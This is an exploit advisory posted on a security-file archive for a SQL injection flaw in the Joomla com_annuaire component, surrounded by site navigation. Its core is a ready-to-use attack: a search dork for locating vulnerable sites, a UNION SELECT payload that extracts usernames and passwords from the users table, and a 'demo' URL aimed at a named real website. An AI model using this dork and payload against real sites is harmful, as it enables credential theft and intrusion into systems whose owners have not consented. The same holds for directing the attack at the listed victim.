Joomla Annuaire SQL Injection

Joomla Annuaire SQL Injection: Posted Dec 2, 2010; Authored by Ashiyane Digital Security Team; The Joomla Annuaire component suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8fe7e3edd8f8d33c508cebacdbabcb7a2130871077a2c527c194bc88fe409e2f; Download | Favorite | View

Joomla Annuaire SQL Injection


=======================================================================
# Joomla Component (com_annuaire) SQL Injection Vulnerability
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /' \  /'__`\   /'__`\ /\_____  \   /\ \/\ \                7
1          /\_, \/\_\L\ \ /\_\L\ \\/___//'/'   \_\ \ \ \____           1
3          \/_/\ \/_/_\_<_\/_/_\_<_   /' /'    /'_` \ \ '__`\          3
3             \ \ \/\ \L\ \ /\ \L\ \ /' /'    /\ \L\ \ \ \L\ \         3
7              \ \_\ \____/ \ \____//\_/      \ \___,_\ \_,__/         7
1               \/_/\/___/   \/___/ \//        \/__,_ /\/___/          1
3              >> Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7               #########################################              7
1               I'm XroGuE 1337 Member from 1337 DataBase              1
3               #########################################              3
3                                                                      3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7

# Name: Joomla Component (com_annuaire) SQL Injection Vulnerability

# Vendor: N/A

# Risk: High

# Date: 2010-12-01

# Author: Ashiyane Digital Security Team

# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com

# Home: www.Ashiyane.org/forums/ 

# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !

==========================================================================
 
[+] Dork: inurl:"index.php?option=com_annuaire"
 
==========================================================================
 
[+] vuln: https://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]


[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
 

[+] Demo: https://www.awa.nc/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/awa_users--

==========================================================================

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Joomla Annuaire SQL Injection

Joomla Annuaire SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Annuaire SQL Injection

Share This

Joomla Annuaire SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems